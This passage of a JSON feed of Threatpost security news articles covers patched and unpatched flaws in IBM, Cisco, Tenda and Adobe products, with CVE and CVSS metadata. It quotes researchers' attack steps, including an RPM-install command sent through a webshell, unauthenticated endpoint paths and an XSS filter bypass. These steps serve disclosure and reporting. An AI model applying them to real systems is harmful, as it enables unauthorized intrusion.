authenticated attacker to upload arbitrary files \u2013 which could then be used to execute arbitrary code on the vulnerable server, according to researchers with Tenable, who discovered the flaws, [in a Monday advisory](<https://www.tenable.com/security/research/tra-2020-54>). 
The bug ranks 8 out of 10 on the CVSS scale, making it high-severity.\n\nThis vulnerability is due to an incomplete fix for CVE-2020-4470, a high-severity flaw [that was previously disclosed in June](<https://nvd.nist.gov/vuln/detail/CVE-2020-4470>). An exploit for CVE-2020-4470 involves two operations, Tenable researchers said: \u201cThe first operation is to upload a malicious RPM package to a directory writable by the administrator account by sending an HTTP POST message to URL endpoint https://<spp_host>:8090/api/plugin,\u201d they said. \u201cThe second operation is to install the malicious RPM by sending an HTTP POST message to URL endpoint http://<spp_host>:8090/emi/api/hotfix.\u201d\n\nBut IBM\u2019s ensuing fix for CVE-2020-4470 only addressed the second operation, by enforcing authentication for the /emi/api/hotfix endpoint. Researchers found it was still possible to upload arbitrary files, without authentication, to a directory writable by the administrator account, under which the endpoint handlers run \u2013 paving the way for code execution on vulnerable systems.\n\n\u201cThe attacker can put malicious content (i.e., scriptlets) in the RPM and issue a \u2018sudo /bin/rpm -ivh /tmp/<uploaded_malicious_rpm>\u2019 command to the webshell, achieving unauthenticated RCE as root,\u201d said researchers.\n\nThe second flaw, CVE-2020-4711, exists in a script (/opt/ECX/tools/scripts/restore_wrapper.sh) within Spectrum Protect Plus. A directory path check within this script can be bypassed via path traversal. An unauthenticated, remote attacker can exploit this issue by sending a specially crafted HTTP request to the URL endpoint https://<spp_host>:8090/catalogmanager/api/catalog, Tenable researchers said.\n\nThat endpoint doesn\u2019t require any authentication (when the cmode parameter is the restorefromjob method). 
When the request has been sent, the endpoint handler calls a method (com.catalogic.ecx.catalogmanager.domain.CatalogManagerServiceImpl.restoreFromJob) without checking for user credentials. The restoreFromJob method then executes the /opt/ECX/tools/scripts/restore_wrapper.sh script as root \u2013 allowing the attacker to view arbitrary files on the system.\n\nTenable researchers discovered the flaws on July 31 and reported them to IBM on Aug. 18. IBM released the patches and an advisory disclosing the flaws on Monday. Threatpost has reached out to IBM for further comment.\n\nIn recent months, various IBM products have been found to have security vulnerabilities. In August, a shared-memory flaw was discovered in [IBM\u2019s next-gen data-management software](<https://threatpost.com/ibm-ai-powered-data-management-software-subject-exploit/158497/>) that researchers said could lead to other threats \u2014 as demonstrated by a new proof-of-concept exploit for the bug.\n\nAnd in April, four serious security vulnerabilities in [the IBM Data Risk Manager](<https://threatpost.com/rce-exploit-ibm-data-risk-manager-no-patch/154986/>) (IDRM) were identified that can lead to unauthenticated remote code execution (RCE) as root in vulnerable versions, according to analysis \u2013 and a proof-of-concept exploit is available.\n", 
"cvss3": {}, "published": "2020-09-15T19:08:13", "type": "threatpost", "title": "IBM Spectrum Protect Plus Security Open to RCE", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-4470", "CVE-2020-4703", "CVE-2020-4711", "CVE-2020-5135"], "modified": "2020-09-15T19:08:13", "id": "THREATPOST:033645C929899D29D91092278D188D8E", "href": "https://threatpost.com/ibm-flaws-spectrum-protect-plus/159268/", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:15:03", "description": "Cisco patched a critical flaw in its wide area network (WAN) software solution for enterprises, which if exploited could give remote, unauthenticated attackers administrator privileges.\n\nThe flaw exists in Cisco Virtual Wide Area Application Services (vWAAS), which is software that Cisco describes as a \u201cWAN optimization solution.\u201d It helps manage business applications that are being leveraged in virtual private cloud infrastructure. The flaw (CVE-2020-3446), which has a critical-severity CVSS score of 9.8 out of 10, exists because user accounts for accessing the software contain default passwords. 
That means an attacker could log in via a default password and thus potentially obtain administrator privileges.\n\n\u201cThe Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory,\u201d according to Cisco\u2019s [Wednesday advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-waas-encsw-cspw-cred-hZzL29A7>).\n\nvWAAS is hosted in compute appliances called Cisco Enterprise Network Compute Series (ENCS). These appliances are also used to deploy the Cisco Enterprise NFV Infrastructure Software (NFVIS), a [software platform](<https://blogs.cisco.com/networking/what-is-cisco-nfv-infrastructure-software>) that implements full lifecycle management from the central orchestrator and controller for virtualized services.\n\nThis vulnerability specifically affects Cisco ENCS 5400-W Series and CSP 5000-W Series appliances if they are running Cisco vWAAS with NFVIS-bundled image releases 6.4.5, or 6.4.3d and earlier. The flaw is fixed in Cisco vWAAS with NFVIS-bundled image releases 6.4.3e, 6.4.5a, and later.\n\nWhile an attacker could be unauthenticated and remote, in order to exploit this vulnerability they would need to be able to connect to the NFVIS command line interface (CLI) on an affected device. 
This would require access to one of the following:\n\n * The Ethernet management port for the CPU on an affected ENCS 5400-W Series appliance.\n * The first port on the four-port I350 PCIe Ethernet Adapter card on an affected CSP 5000-W Series appliance.\n * A connection to the vWAAS software CLI and a valid user credential to authenticate on the vWAAS CLI first.\n * Or a connection to the Cisco Integrated Management Controller (CIMC) interface of the ENCS 5400-W Series or CSP 5000-W Series appliance (and a valid user credential to authenticate to the CIMC first).\n\nCisco on Wednesday also issued patches for two high-severity vulnerabilities (CVE-2020-3506, CVE-2020-3507) in its Video Surveillance 8000 Series IP cameras, which could enable remote code execution and denial of service (DoS).\n\n\u201cMultiple vulnerabilities in the Cisco Discovery Protocol implementation for Cisco Video Surveillance 8000 Series IP Cameras could allow an unauthenticated, adjacent attacker to execute code remotely or cause a reload of an affected IP camera,\u201d according to Cisco.\n\nAnd, a high-severity flaw (CVE-2020-3443) [found and fixed](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smart-priv-esca-nqwxXWBu>) in Cisco Smart Software Manager On-Prem (SSM On-Prem) could allow an authenticated, remote attacker to elevate privileges and execute commands with higher privileges.\n", 
"cvss3": {}, "published": "2020-08-20T12:43:13", "type": "threatpost", "title": "Cisco Critical Flaw Patched in WAN Software Solution", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3443", "CVE-2020-3446", "CVE-2020-3506", "CVE-2020-3507"], "modified": "2020-08-20T12:43:13", "id": "THREATPOST:245021185706E94E1CA436608011DDB2", "href": "https://threatpost.com/cisco-critical-flaw-patched-in-wan-software-solution/158485/", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:25:44", "description": "A critical Cisco vulnerability exists in its administrative management tool for Cisco network security solutions. 
The flaw could allow an unauthenticated, remote attacker to gain administrative privileges on impacted devices.\n\nThe flaw exists in the web-based management interface of the [Cisco Firepower Management Center](<https://www.cisco.com/c/en_au/products/security/firesight-management-center/index.html>) (FMC), which is its platform for managing Cisco network security solutions, like [firewalls](<https://www.cisco.com/c/en_au/products/security/firewalls/index.html#~stickynav=1>) or its [advanced malware protection](<https://www.cisco.com/c/en_au/products/security/advanced-malware-protection/index.html>) service. Cisco has released patches for the vulnerability (CVE-2019-16028), which has a score of 9.8 out of 10 on the CVSS scale, making it critical in severity.\n\n\u201cThe Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory,\u201d Cisco said in its [advisory released Wednesday](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200122-fmc-auth>).\n\nThe vulnerability stems from \u201cimproper handling\u201d of Lightweight Directory Access Protocol (LDAP) authentication responses from an external authentication server. LDAP is an industry standard application protocol used to access and manage directory information over an IP network.\n\nLDAP is used for a variety of functions within FMC, such as FMC Web Management Portal Authentication, Remote Access VPN Authorization, command line interface authorization, and others. This vulnerability impacts only the FMC Web Management Portal if it is configured to authenticate users of the web management portal through an external LDAP server.\n\nAn attacker could exploit this vulnerability by sending crafted HTTP requests to a vulnerable device, Cisco said. 
They could then bypass authentication and gain administrative access to the web-based management interface of the affected device.\n\n[According to Omar Santos](<https://community.cisco.com/t5/security-documents/assessing-the-impact-of-the-cisco-firepower-management-center/ta-p/4016460>), principal engineer for the Cisco PSIRT, Cisco customers can do the following to determine whether they are impacted:\n\n * Check if the Cisco FMC Software is configured to authenticate users of the web-based management interface through an external LDAP server;\n * Check if external authentication using an LDAP server is configured on the device (System > Users > External Authentication)\n\nOverall, Cisco [released updates addressing 27 flaws](<https://tools.cisco.com/security/center/publicationListing.x?product=Cisco&sort=-day_sir&limit=50#~Vulnerabilities>) on Wednesday, including the critical flaw, seven high-severity vulnerabilities and 19 medium-severity glitches. Some of the patched high-severity flaws exist in Cisco\u2019s [TelePresence Collaboration Endpoint](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-telepresence-path-tr-wdrnYEZZ>) (a product designed to link two rooms so they resemble a single conference room), [its SD-WAN](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sd-wan-cred-EVGSF259>) solution, its [IOS XR software](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200122-ios-xr-routes>) and more.\n\nIt\u2019s been a busy start to 2020 so far for Cisco in terms of security updates. 
Earlier this month, Cisco [fixed two high-severity vulnerabilities](<https://threatpost.com/cisco-webex-bug-allows-remote-code-execution/151724/>) in its products, including one in its popular Webex video conferencing platform, that could enable a remote attacker to execute commands.\n\nAlso earlier in January, [Cisco patched three critical vulnerabilities](<https://threatpost.com/cisco-patches-3-critical-bugs-nx-os/151529/>) (CVE-2019-15975, CVE-2019-15976, CVE-2019-15977) in its Data Center Network Manager (DCNM), for which a [proof-of-concept exploit](<https://threatpost.com/cisco-dcnm-flaw-exploit/151949/>) was later published.\n", "cvss3": {}, "published": "2020-01-23T15:56:41", "type": "threatpost", "title": "Cisco Warns of Critical Network Security Tool Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-15975", "CVE-2019-15976", "CVE-2019-15977", "CVE-2019-16028", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-01-23T15:56:41", "id": "THREATPOST:62D348CF6DAF40D6FBCD313A3BCEDBF9", "href": "https://threatpost.com/cisco-critical-network-security-tool-flaw/152131/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:23:16", "description": "Cisco Systems has patched two high-severity vulnerabilities in its popular Webex video conferencing platform, which if exploited could allow an attacker to execute code on affected systems.\n\nTwo multimedia players tied to the Webex platform are impacted. First is the Cisco Webex Network Recording Player, used to play back Advanced Recording Format (ARF) files on the Windows operating system. ARF files contain data from a recorded online meeting, such as video data and a list of attendees. Cisco Webex Player, which is used to play back Webex Recording Format (WRF) files on the Windows OS, is also affected. 
WRF files contain audio and video recordings, typically used for demonstrations, training and conferencing.\n\nThe vulnerabilities ([CVE-2020-3127](<https://nvd.nist.gov/vuln/detail/CVE-2020-3127>) and [CVE-2020-3128](<https://nvd.nist.gov/vuln/detail/CVE-2020-3128>)) are both 7.8 out of 10.0 on the CVSS scale, making them high-severity. They stem from an insufficient validation of non-detailed, \u201ccertain elements\u201d within a Webex recording that is stored in either ARF or WRF, said Cisco.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nWhile Cisco did not detail the technicalities of the vulnerabilities, it said that \u201can attacker could exploit these vulnerabilities by sending a malicious ARF or WRF file to a user through a link or email attachment and persuading the user to open the file on the local system,\u201d according to Cisco in a [Wednesday advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200304-webex-player>). \u201cA successful exploit could allow the attacker to execute arbitrary code on the affected system with the privileges of the targeted user.\u201d\n\nBrian Gorenc, director of vulnerability research and head of Trend Micro\u2019s ZDI program, told Threatpost that the flaw allows remote attackers to execute arbitrary code \u2013 but it does require user interaction.\n\n\u201cUser interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file,\u201d he told Threatpost via email. \u201cSpecifically, this bug exists in the atpdmod.dll module and the vulnerable code is reachable using a crafted ARF File. This program fails to initialize a pointer and later writes data to this pointer. 
In the worst case, this could lead to remote code execution in the context of the current process.\u201d\n\nDifferent versions of Webex Network Recording Player and Webex Player are affected by the flaws, based on the platforms they are being managed on. The players are available from Cisco Webex Meetings and Cisco Webex Meetings Online (which is when conferencing systems are managed by Cisco Webex), and Cisco Webex Meetings Server (where customers host and manage conferencing solutions in their own private clouds).\n\nFor Cisco Webex Meetings, affected versions for both products include releases earlier than WBS 39.5.17 or WBS 39.11.0. For Webex Meetings Online, affected versions for both products include releases earlier than 1.3.49. And, for Cisco Webex Meetings Server, versions of Webex Network Recording Player earlier than 3.0MR3SecurityPatch1 and 4.0MR2SecurityPatch2 are affected.\n\nTo determine which release of Cisco Webex Network Recording Player or Cisco Webex Player is installed on a system, users can open the player and choose Help > About. The fixed releases can be found below.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/03/05093159/Screen-Shot-2020-03-05-at-9.05.50-AM.png>)\n\nCisco said it\u2019s not aware of the flaws being exploited by attackers at this time. Francis Provencher (PRL) working with Trend Micro Zero Day Initiative, and Kexu Wang of Fortinet\u2019s FortiGuard Labs were credited with discovering the flaws (Threatpost has reached out to both researchers for further details of the vulnerability and will update this post accordingly).\n\nWebex has been haunted by other vulnerabilities since the start of the year. In January, [Cisco fixed a high-severity vulnerability](<https://threatpost.com/cisco-webex-flaw-lets-unauthenticated-users-join-private-online-meetings/152191/>) in Webex that could have let strangers barge in on password-protected meetings sans authentication. 
A [separate high-severity flaw](<https://threatpost.com/cisco-webex-bug-allows-remote-code-execution/151724/>) also disclosed by Cisco in January could enable a remote attacker to execute commands in Webex.\n\nBeyond Webex, Cisco on Wednesday [released patches addressing](<https://tools.cisco.com/security/center/publicationListing.x>) flaws tied to a total of 13 CVEs. Other high-severity flaws include a vulnerability in the SSL implementation of the Cisco Intelligent Proximity solution, which is a tool allowing users to see and control content in a meeting room from their own devices. The certificate validation vulnerability ([CVE-2020-3155](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-proximity-ssl-cert-gBBu3RB>)) could allow an unauthenticated, remote attacker to view or alter information shared on Cisco Webex video devices and Cisco collaboration endpoints.\n\nAnd, a high-severity cross-site request forgery (CSRF) flaw exists in Cisco Prime Network Registrar, software comprising components for various services, including Domain Name System (DNS) services and Dynamic Host Configuration Protocol services. The flaw (CVE-2020-3148) in the online interface of the registrar could allow an unauthenticated, remote attacker to conduct a CSRF attack on an affected system.\n\n**_Interested in security for the Internet of Things and how 5G will change the threat landscape? Join our free Threatpost webinar, [\u201c5G, the Olympics and Next-Gen Security Challenges,\u201d](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>) as our panel discusses what use cases to expect in 2020 (the Olympics will be a first test), why 5G security risks are different, the role of AI in defense and how enterprises can manage their risk. 
[Register here](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>)._**\n", "cvss3": {}, "published": "2020-03-05T15:11:11", "type": "threatpost", "title": "High-Severity Cisco Webex Flaws Fixed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3127", "CVE-2020-3128", "CVE-2020-3148", "CVE-2020-3155"], "modified": "2020-03-05T15:11:11", "id": "THREATPOST:FC2AB9DBD639AEF3E55048C4BBCFC321", "href": "https://threatpost.com/high-severity-cisco-webex-flaws-fixed/153462/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:14:21", "description": "Researchers are warning of a critical remote code-execution (RCE) flaw in the Windows version of Cisco Jabber, the networking company\u2019s video-conferencing and instant-messaging application. Attackers can exploit the flaw merely by sending targets specially crafted messages \u2013 no user interaction required.\n\nThe flaw ([CVE-2020-3495](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-jabber-UyTKCPGg>)) has a CVSS score of 9.9 out of 10, making it critical in severity, Cisco said in a Wednesday advisory. Researchers with Watchcom, who discovered the flaw, said that with remote workforces surging during the [coronavirus pandemic](<https://threatpost.com/working-from-home-covid-19s-constellation-of-security-challenges/153720/>), the implications of the vulnerability are especially serious.\n\n\u201cGiven their newfound prevalence in organizations of all sizes, these applications are becoming an increasingly attractive target for attackers,\u201d Watchcom researchers said in an [analysis on Wednesday](<https://watchcom.no/nyheter/nyhetsarkiv/uncovers-cisco-jabber-vulnerabilities/>). 
\u201cA lot of sensitive information is shared through video calls or instant messages, and the applications are used by the majority of employees, including those with privileged access to other IT systems.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAn attacker could exploit the flaw by sending specially crafted Extensible Messaging and Presence Protocol (XMPP) messages to vulnerable end-user systems running Cisco Jabber for Windows. XMPP is an XML-based protocol for instant messaging, based on an open standard, which is widely used in both open-source and proprietary software.\n\nWhile attackers can be remote to launch such an attack, they may require access to the same XMPP domain or another method of access to be able to send messages to clients, according to researchers. However, for the most part, the attack is easy to carry out: No user interaction is required on the part of the targeted victim, and the vulnerability can be exploited even when Cisco Jabber is running in the background.\n\nThe issue stems from Cisco Jabber improperly validating message contents; the application does not properly sanitize incoming HTML messages. It instead passes the messages through a flawed cross-site scripting (XSS) filter. Researchers discovered that this filter could be bypassed using an attribute called \u201conanimationstart.\u201d This attribute is used to specify a JavaScript function that will be called when an element\u2019s CSS animation starts playing.\n\nUsing the attribute (along with a built-in animation assigned to it) researchers found it was possible to create malicious HTML tags that the filter did not catch, and were ultimately executed. As a final step, researchers created a malicious message using these HTML tags, that then intercepted an XMPP message sent by the application and modified it.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/09/03125156/jabber-calc.gif>)\n\nThe Jabber RCE vulnerability in action. 
Credit: Watchcom\n\nAttackers can do this manually on their own machine or it can be automated to create a worm that spreads automatically, said researchers.\n\nFinally, \u201cas a result of exploitation, an attacker could cause the application to run an arbitrary executable that already exists within the local file path of the application,\u201d according to Cisco. \u201cThe executable would run on the end-user system with the privileges of the user who initiated the Cisco Jabber client application.\u201d\n\nSystems using Cisco Jabber in phone-only mode (without XMPP messaging services enabled) are not vulnerable to exploitation, Cisco\u2019s advisory said. In addition, the vulnerability is not exploitable when Cisco Jabber is configured to use messaging services other than XMPP messaging.\n\nThe vulnerabilities affect all currently supported versions of the Cisco Jabber client (12.1 \u2013 12.9). Cisco has released updates for different releases of affected Cisco Jabber. See the fixes in the table below:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/09/03125052/cisco-jabber.png>)\n\nResearchers said that they found three other vulnerabilities in Cisco Jabber, including a protocol-handler-command injection (CVE-2020-3430), an information-disclosure flaw (CVE-2020-3498) and a Universal Naming Convention link-handling issue (CVE-2020-3537).\n\nCisco said it is not aware of any public announcements or malicious use of the flaw.\n\n**[On Wed Sept. 16 @ 2 PM ET:](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>) Learn the secrets to running a successful Bug Bounty Program. 
[Register today](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>) for this FREE Threatpost webinar \u201c[Five Essentials for Running a Successful Bug Bounty Program](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)\u201c. Hear from top Bug Bounty Program experts how to juggle public versus private programs and how to navigate the tricky terrain of managing Bug Hunters, disclosure policies and budgets. Join us Wednesday Sept. 16, 2-3 PM ET for this [LIVE](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>) webinar.**\n", "cvss3": {}, "published": "2020-09-03T17:30:07", "type": "threatpost", "title": "Attackers Can Exploit Critical Cisco Jabber Flaw With One Message", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3430", "CVE-2020-3495", "CVE-2020-3498", "CVE-2020-3537"], "modified": "2020-09-03T17:30:07", "id": "THREATPOST:D2E35B61D2D9455A00F50AC6B8A5A129", "href": "https://threatpost.com/attackers-can-exploit-critical-cisco-jabber-flaw-with-one-message/158942/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:17:39", "description": "A popular Wi-Fi extender for the home has multiple unpatched vulnerabilities, including the use of a weak, default password, according to researchers. 
Also, two of the bugs could allow complete remote control of the device.\n\nThe flaws have been found in Tenda PA6 Wi-Fi Powerline extender, version 1.0.1.21, which extends the wireless network throughout the house using [HomePlug AV2](<https://en.wikipedia.org/wiki/HomePlug>) technology.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cA compromised device can become part of an internet of things (IoT) botnet that launches distributed denial-of-service (DDoS) attacks, used to pivot to other connected devices, leveraged to mine for cryptocurrency or used in various other unauthorized ways,\u201d explained researchers at IBM X-Force, [in a posting](<https://securityintelligence.com/posts/vulnerable-powerline-extenders-underline-lax-iot-security/>) last week.\n\n## **Web Server Woes**\n\nThe first two bugs are a command-injection issue ([CVE-2019-16213](<https://exchange.xforce.ibmcloud.com/vulnerabilities/172226?_ga=2.159458491.740009505.1593441219-1535918128.1584710346&cm_mc_uid=31770786977815754792789&cm_mc_sid_50200000=45644951593441218861>)); and a critical buffer overflow ([CVE-2019-19505](<https://exchange.xforce.ibmcloud.com/vulnerabilities/172228?_ga=2.159458491.740009505.1593441219-1535918128.1584710346&cm_mc_uid=31770786977815754792789&cm_mc_sid_50200000=45644951593441218861>)). They are found in the extender device\u2019s web server, under a process named \u201chttpd.\u201d\n\nThe command-injection vulnerability carries a rating of 8.8 out of 10 on the CVSS severity scale. It arises from the fact that under the \u201cPowerline\u201d section in the user interface (UI) of the extender\u2019s web server, the user can see and change the name of the other powerline communication (PLC) devices which are attached to the same powerline network. An authenticated user can inject an arbitrary command just by changing the device name of an attached PLC adapter with a specially crafted string, the researchers noted. 
Since the web server is running with root privileges, an attacker could leverage this injection to fully compromise the device.\n\n\u201cThe name entered by the user is concatenated as an argument to the \u2018homeplugctl\u2019 application and being executed by the \u2018system\u2019 library function,\u201d according to IBM X-Force. \u201cThis user input is just URL decoded, without any validation or sanitation.\u201d\n\nThe second vulnerability is found in the \u201cWireless\u201d section in the web-UI: By adding a device to the Wireless Access Control list with a specially crafted hostname, a remote attacker could overflow a buffer and execute arbitrary code on the system or cause the application to crash. It\u2019s listed as critical, with a 9.8 severity rating.\n\n\u201cIt is possible to overwrite the return address register $ra and begin controlling program execution,\u201d according to the analysis. \u201cA motivated attacker can utilize this to potentially execute arbitrary code. Note that the overflow isn\u2019t a result of an unsafe call to functions like strcpy or memcpy.\u201d\n\n## **Pivoting to a Remote Attack**\n\nBoth bugs are post-authentication \u2013 so a user would need to be signed in to exploit the bugs. But there\u2019s a big caveat to this: The web server itself is password-protected with the default (and very guessable) password \u201cadmin.\u201d\n\n\u201cBoth vulnerabilities in this web-UI allow an authenticated user to compromise the device with root privileges, and while authentication should provide a layer of security, in this case, with a weak and guessable password, it should not be considered adequate protection,\u201d explained the researchers.\n\nSimilarly, the web server interface should only be accessible from the local network \u2013 however, a wrong setup and configuration can expose it to the internet and therefore remote attackers. 
And, IBM X-Force found that combining these vulnerabilities with a DNS rebinding technique provides the attacker with a remote vector that doesn\u2019t depend on the user\u2019s configuration.\n\n\u201cThat remote attack vector is not far-fetched here, and using a technique called DNS rebinding, we were able to perform the same attack from a remote website, overcoming same-origin limitations by the browser,\u201d said the researchers. \u201cWith this known technique, once the victim is tricked into visiting a malicious website, their entire local network is exposed to the attacker.\u201d\n\nDNS rebinding involves using a malicious JavaScript payload to scan the local network looking for vulnerable powerline extenders. If found, a login could be attempted using a list of popular passwords.\n\n\u201cIn our demo we were able to get a reverse shell on the vulnerable device just by having someone with access to the device\u2019s network visit our website,\u201d said the researchers. \u201cThis is significant as it allows an attacker to gain control over the vulnerable devices remotely just by having the victim visit a website.\u201d\n\n## **Pre-Auth Denial of Service**\n\nThe third vulnerability ([CVE-2019-19506](<https://exchange.xforce.ibmcloud.com/vulnerabilities/172229?_ga=2.159458491.740009505.1593441219-1535918128.1584710346&cm_mc_uid=31770786977815754792789&cm_mc_sid_50200000=45644951593441218861>)), which rates 7.5 out of 10 on the severity scale, resides in a process named \u201chomeplugd,\u201d which is related to the extender device\u2019s powerline functionality. By sending a specially crafted UDP packet, an attacker could exploit this vulnerability to cause the device to reboot. 
By causing a recurring reboot, the device will loop through restarts and not be able to carry out its functions or connect to the internet.\n\nUnlike the other two bugs, an attacker in this case would not need to be authenticated.\n\n\u201cAs we were inspecting the open ports and their corresponding services on the extender, we noticed the homeplugd process listening on UDP port 48912,\u201d according to the analysis. \u201cReversing the binary revealed to us that no authentication was required to interact with this service.\u201d\n\n## **Patch Status**\n\nThere are currently no patches for the issues.\n\n\u201cUnfortunately, despite repeated attempts to contact Tenda, IBM is yet to receive any reply to its emails and phone calls,\u201d the researchers said. \u201cIt remains unknown whether the company is working on patches.\u201d\n\nThreatpost has also reached out to the vendor for more information.\n\nTo protect themselves, users should change default passwords on all devices that connect to the internet; update firmware regularly; and use internal filtering controls or a firewall.\n\n\u201cWhile most flaws in popular software are addressed and patched, devices like powerline extenders, [and even routers](<https://threatpost.com/cisco-ios-xe-flaw-sd-wan-routers/155319/>), do not seem to receive the same treatment, and are all too often left exposed to potential attacks,\u201d the researchers concluded. \u201cBut these devices are not just a connectivity plug on the edge of the network. A critical enough vulnerability can be leveraged to reach other parts of the network. That is especially true for routers, but it also extends to other devices that have some sort of interface into the network.\u201d\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. 
ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a [FREE webinar](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>), \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. [Click here to register](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>) for this Threatpost webinar, sponsored by Valimail._**\n", "cvss3": {}, "published": "2020-06-29T16:48:17", "type": "threatpost", "title": "Unpatched Wi-Fi Extender Opens Home Networks to Remote Control", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-16213", "CVE-2019-19505", "CVE-2019-19506", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135"], "modified": "2020-06-29T16:48:17", "id": "THREATPOST:7FC78356FBFC440CD45BB996E2A8A5C8", "href": "https://threatpost.com/unpatched-wi-fi-extender-remote-control/156990/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:19:42", "description": "Adobe has issued an out-of-band patch for a critical flaw in Adobe Character Animator, its application for creating live motion-capture animation videos. The flaw can be exploited by a remote attacker to execute code on affected systems.\n\nThe flaw ([CVE-2020-9586](<https://helpx.adobe.com/security/products/character_animator/apsb20-25.html>)) is found in versions 3.2 and earlier and exists within the parsing of the BoundingBox element in PostScript. 
Specifically, it stems from a stack-based buffer overflow error, meaning the element lacks proper validation of the length of user-supplied data prior to copying it to a stack-based buffer.\n\n\u201cOf the bugs fixed today, CVE-2020-9586 stands out as it could lead to code execution if a user opens a malicious file or visits a malicious web page,\u201d Dustin Childs, manager at Trend Micro\u2019s Zero Day Initiative, told Threatpost. \u201cAn attacker can leverage this vulnerability to execute code in the context of the current process.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nUsers are urged to update to version 3.3 for Windows and macOS. While the flaw is critical, the security bulletin is a Priority 3 update, which according to Adobe resolves vulnerabilities in a product that has historically not been a target for attackers. \u201cAdobe recommends administrators install the update at their discretion,\u201d according to the update.\n\nAdobe on Tuesday also issued several updates addressing other flaws. While these other vulnerabilities are \u201cimportant\u201d in severity, they would all need to be combined with additional bugs to gain code execution, Childs told Threatpost.\n\nOne such flaw exists in [Adobe Premiere Rush](<https://helpx.adobe.com/security/products/premiere_rush/apsb20-29.html>), its video editing software for online video creators. The software has an out-of-bounds read vulnerability (CVE-2020-9617) that could lead to information disclosure. Users are urged to update to Adobe Premiere Rush version 1.5.12 for Windows and macOS.\n\nAnother \u201cimportant\u201d-severity flaw exists in [Adobe Premiere Pro](<https://helpx.adobe.com/security/products/premiere_pro/apsb20-27.html>), another version of Adobe\u2019s video editing software that is more advanced than Adobe Premiere Rush (which is instead more targeted toward YouTubers and social media creators). 
Like Premiere Rush, Premiere Pro has an out-of-bounds read flaw (CVE-2020-9616) that could lead to information disclosure. Users can update to version 14.2 for Windows and macOS.\n\nFinally, Adobe stomped out a flaw in [Audition](<https://helpx.adobe.com/security/products/audition/apsb20-28.html>), which is its toolset offering for creating and editing audio content. The out-of-bounds read flaw (CVE-2020-9618) can enable information disclosure if exploited. A patch is available in Audition 13.0.6 for Windows and macOS.\n\nFor all of these flaws, \u201cAdobe is not aware of any exploits in the wild for any of the issues addressed in these updates,\u201d according to the alert. Mat Powell with ZDI was credited with discovering these flaws.\n\nThe unscheduled patches come a week after [Adobe\u2019s regularly-scheduled updates](<https://threatpost.com/adobe-kills-16-critical-flaws-in-acrobat-and-reader-digital-negative-sdk/155652/>), which fixed 16 critical flaws across its Acrobat and Reader applications and its Adobe Digital Negative (DNG) Software Development Kit \u2013 and addressed 36 CVEs overall.\n\n**_Concerned about the IoT security challenges businesses face as more connected devices run our enterprises, drive our manufacturing lines, track and deliver healthcare to patients, and more? On [June 3 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>), join renowned security technologist Bruce Schneier, 